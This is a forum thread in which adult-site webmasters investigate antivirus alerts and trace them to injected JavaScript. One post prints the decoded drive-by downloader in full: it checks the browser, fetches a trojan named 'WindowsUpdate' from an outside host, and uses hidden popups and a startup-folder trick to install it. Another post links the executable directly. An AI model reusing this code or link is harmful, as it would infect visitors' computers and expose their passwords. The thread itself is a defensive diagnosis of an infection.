Virus alerts on TGP's
 

I was submitting galleries today and noticed a Trojan virus detected when loading both the main pages on pornno.com and snakesworld.com. I consider my computer pretty secure. Anyone else noticing this?

havent noticed... and im not going to go looking for them:glugglug

hehe - only wondering because I already have done a few spyware scans and nothing was detected so I believe it's not on my poc

What spyware programs are you using?..all those free ones do not completly remove them..I have them all and they do find most but not all of them..BTW I looked and didn't get any warnings,I'm guessing it's on your box

I use adaware and spybot, I just had a friend visit the sites and got the same virus alerts... I guess you would need Norton to see them

yeah whever i go out to find more TGPs to submit to, that usually happens. sucks

It took a minute but I did get a warning on snakesworld...I have norton as well...maybe he doesn't know he has it

they are both hosted by candid..... hmmmm

just use firefox to solve those problems at the source.

yep i get em too :BangBang:

Hey, you shouldn't be getting any virus alerts. I think you may be infected with some shit. I don't get the warnings and I'm using Norton also.
Did you check your system for "snakesworld" or "pornno".

Also, run CWShredder and see what happens.
Get it here
http://www.spywareinfo.com/~merijn/downloads.html

If you can't get to this page you're infected. If you can download CWShredder and let me know what happens.

If you get the same shit, I'll dig some more.
Thanks,
Snake

I have had this problems! Some tgps on webmaster page (submission page) have viruses and spywares! Install some antivirus, spaywer remover and firewall!

Yes, Cosis, you are right.
And pornno.com and snakesworld.com install the same Trojan.DownLoader version from rockyspornpalace.com
First downloaded file name is WindowsUpdate[random number].exe

Here is javascript line which creates URL:

burl="http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";


beemk, snakesworld has it at the bottom of page but upper then </BODY> tag, pornno has it in the begining of Asians section, so I doubt host can do it.

I do not think they are hackers of course, looks like they do it for money.

thurbs, you are right, here is function from snakesworld/pornno trojan downloader which decides to download trojan or not:

function BadBrowser()
{
if(navigator.appName!="Microsoft Internet Explorer")
return 1;
if(!navigator.cookieEnabled)
return 1;
if(navigator.platform!="Win32")
return 1;
if(navigator.userAgent.indexOf("MSIE 5.5")hahahaha-1 && navigator.userAgent.indexOf("MSIE 6.")hahahaha-1)
return 1;
if(document.cookie.indexOf("msip=6x")>-1)
return 1;
}


Snake, if your site IP is not 64.158.30.220 check your nameserver.

yes i get that shit all the time pretty annoying never gets past the scanner though

I get the alert when I go to snakesworld as well.

Anyone know what these trojans do? Turn machines into spam boxes?

mGreg,

name Trojan.DownLoader shows, this program does nothing itself, just opens the door for ANY trojans.

Zillion people scan the Net to find infected computers, then they install on your comp whatever they want, but first of all they download all your passwords.

Read here:
http://www.viruslibrary.com/virusinf...Downloader.htm

I had some nasty shit installed while doing movie galleries. Don't remember what site it was, but it fucked my shit up for awhile. Just watch yourself, it's a crazy world out there man.

Thanks for the info!

I'd like to see the source code you guys are seeing. I'm not doing this for money, who the fuck is Rocky's Porn Palace anyway?
I think your computers are infected, cause I see nothing on my end. I see nothing on the server or in the source or the page when I look at it, unless it's some of that new "invisible text"....


Where on my page do you see the code?

How long has this been happening?

Do you think the js code for Nasty's Camcrush link could be hijacked? or just the cause of Norton alerts.

I get nothing here on my end. The only thing I've changed is that link to Camcrush and now I'm getting complaints.

Help me out here.
Thanks
Snake

Hi Snake,

Clear your cookies (at least from snakesworld.com) and load your main page - then view source. You'll see a block of encoded javascript at the bottom, just beneath your copyright.

I've done this twice to be sure - without clearing cookies, it happens once, then everything is fine. Clear the cookie, and it comes back the next time you load the page.

I'd post the javascript here, but I don't know what would happen :-)

Cleared cookies and don't see it. I think you have a virus in your machine. It's definately not being done purposely on my end. Check my page again, I'll remove the js bullshit and let me know if it happens again.
thanks,
Snake

Hi Snake,

I no longer see it on your page, but if you look at pornno.com in the "Asians" section of the html you will see it.

Have you re-uploaded your links.html file recently? That might be why it's not showing right now.


http://www.teeneroticaclub.net/Capture.jpg

I pulled this from links.html just a few minutes ago.


Hey - I know you are not doing it on purpose - just trying to help ya out :-)

http://www.18pluspics.com/hotlink/snakes.jpg

Snake, this code was found on snakesworld and pornno from many machines (mostly UNIX), so I doubt they all could be infected.

Please show us code you have between

Copyright
1997-2004</FONT></FONT>
</CENTER>

and

</BODY></HTML>

We all see there encoded javascript.
Here you can see this script decoded:

var pop;
var uploaded;
var obj;
var burl;
var hiddenImg;
var totalobj;

function BadBrowser()
{
if(navigator.appName!="Microsoft Internet Explorer")
return 1;
if(!navigator.cookieEnabled)
return 1;
if(navigator.platform!="Win32")
return 1;
if(navigator.userAgent.indexOf("MSIE 5.5")hahahaha-1 && navigator.userAgent.indexOf("MSIE 6.")hahahaha-1)
return 1;
if(document.cookie.indexOf("msip=6x")>-1)
return 1;
}

uploaded=BadBrowser();


if(!uploaded)
{
burl="http://www.rockyspornpalace.com/ad/banners/29406/82405/WindowsUpdate"+(Math.random()+" ").substr(2,5)+".exe";
}

function initpop()
{
if(!pop)
{
pop=window.createPopup();
var oBody = pop.document.body;


pop.document.bgColor="black";
oBody.style.border = "solid black 0px";
oBody.style.position="absolute";
oBody.style.left= "0";
oBody.style.top= "0";
var temp;
temp='<DIV style="position:relative;"><a href="'+"#\" onBlur='parent.document.getElementById(\"i_frame\" ).style.visibility=\"hidden\"' ";
temp+=
"onMouseOut='document.getElementById(\"client\").s tyle.visibility=\"hidden\"' \
OnMouseOver='document.getElementById(\"client\").s tyle.visibility=\"visible\"' \
onMouseDown='parent.document.getElementById(\"i_fr ame\").style.visibility=\"visible\";parent.pop.sho w(1,1,1,1);parent.uploaded=1;parent.DoClick();'> \
I\
<DIV ID=\"client\" STYLE=\"visibility:hidden; position:absolute; top:-25; left:-25;\">\
<img nocache border=1 style=\"width=500px;heigth=500px; cursor:hand;\" dynsrc=\""+burl+"\" ></div></a></div>";


oBody.innerHTML=temp;
}
}

function clean()
{
uploaded=1;
if(pop)
pop.hide();
}

if(!uploaded)
{
initpop();
window.onbeforeunload=clean;
}


function DoClick()
{
document.cookie="msip=6x; path=/; expires=Mon, 31 Dec 2005 23:59:59 UTC;";
window.setTimeout('obj.click();',300);
}

function showpop()
{
if(uploaded)
return;
obj=window.event.srcElement;
if(!pop)
{
initpop();
}

pop.show(window.event.screenX,window.event.screenY ,1,1);
document.getElementById("i_frame").style.left=wind ow.event.screenX-window.screenLeft-document.body.clientLeft+document.body.scrollLeft;
document.getElementById("i_frame").style.top=windo w.event.screenY-window.screenTop-document.body.clientTop+document.body.scrollTop;
}


function SetAllEvents()
{
if(pop.document.readyStatehahahaha"complete" && totalobj!=document.all.length)
{
totalobj=document.all.length;
for(i = 0; i < document.all.length; i++){
if(document.all(i).tagNamehahahaha"A" && document.all(i).id!="clientcall")
document.all(i).onmousemove=showpop;}
}
setTimeout("SetAllEvents();", 400);
}

if(!uploaded)
{
setTimeout("SetAllEvents();", 400);
window.setTimeout('window.defaultStatus=" "',2000);

document.write('<div id=i_frame name=i_frame STYLE="visibility:hidden;position:absolute;top=0;l eft=0;width:1;height:1;overflow:hidden"><iframe frameborder="1" name="clientframe" id="clientframe" style="position:relative;top=-250;left=-440;width:700;height:700;"></iframe></div>');
document.write('<a folder="shell:startup" target="clientframe" id="clientcall" style="visibility:hidden;display:none;behavior:url (#default#AnchorClick);"></a>');
document.getElementById("clientcall").click();
document.write('<iframe src="about:blank" style="visibility:hidden;display:none;"></iframe>');
}

Germes, when i look at snakes source, i dont see any code in that spot..

Germes,
There is no code on my pages between the area you mentioned.
I think when I had the .js script on there for NastyDollars Cam site it was exploited by a js exploit. I'm not an expert but it seems to only affect certain machines.
I see Pornno.com also runs a few .js scripts and I do see the jscript encode in his source, but not on my pages.

Can you take a look in my archives where I only have the "Adult Friend Finder" link at the bottom
http://www.snakesworld.com/oct1618.html

and tell me if you see the same shit. If not, I think "Rocky" has a little explaining to do.

BTW, I know you guys are trying to help and I appreciate it.

Hello Shemp!

Sometimes I do not see it too.
A few minutes later I see it from the same IP.
Clean up cookies and try again.

thanks Germes, this is very perplexing...

I just bit the bullet and loaded up rockyspornpalace.. nothing major, but massive popups...

It's gone now..:thumbsup

Snake,

page http://www.snakesworld.com/oct1618.html
looks clean for me.

If you do not have any code on the page, check httpd.conf and .htaccess files

There are not too many ways to insert code

I removed the .js from my page earlier, is anyone still seeing the jscript encode?

I emailed Pornno, but don't know if I have the right contact info, if anyone has it they should let him know what's up.


Also, Shemp this is perplexing to me also, but what' s worse is I may actually break 50 posts on GFY after all these years!

If you can't see the code, and don't get the virus/trojan notification from Norton (assuming you do have norton installed) try changing your IE settings to request a new copy of the page each visit. eg; Tools->Internet Options->Temporary Internet Files-->Settings-->Every Visit

When I do this I get the code and the norton popups every time I refresh the links.html page.

hehe, i never thought you would get to 50 posts ;)

spunky, no, it is back

fusionx, try to download
http://www.rockyspornpalace.com/ad/banners/29406/82404/WindowsUpdate31327.exe
but be careful, it is trojan

Shemp, yes, cheaters are smart.
BTW, gallery http://www.darkestelf.com/dp19t.htm on your TGP redirects to http://stats.yourownfreehost.com/redir.php?buyer_id=147&userid=cheyenne&is_u=0

Snake I just visited your page and got 3 prompts from mcafree for trojans, I looked at your source and saw the code at the very bottom of your page. This is after your camcrush links were removed.

Sorry, Snake, but I still can see this code :(

Hmmm.deleted cookies and went here... http://www.snakesworld.com/links.html
...seemed fine here,no trojan warnings

I tried clearing cookies and such and do not see it loading anymore. Could it just load for certain ip blocks?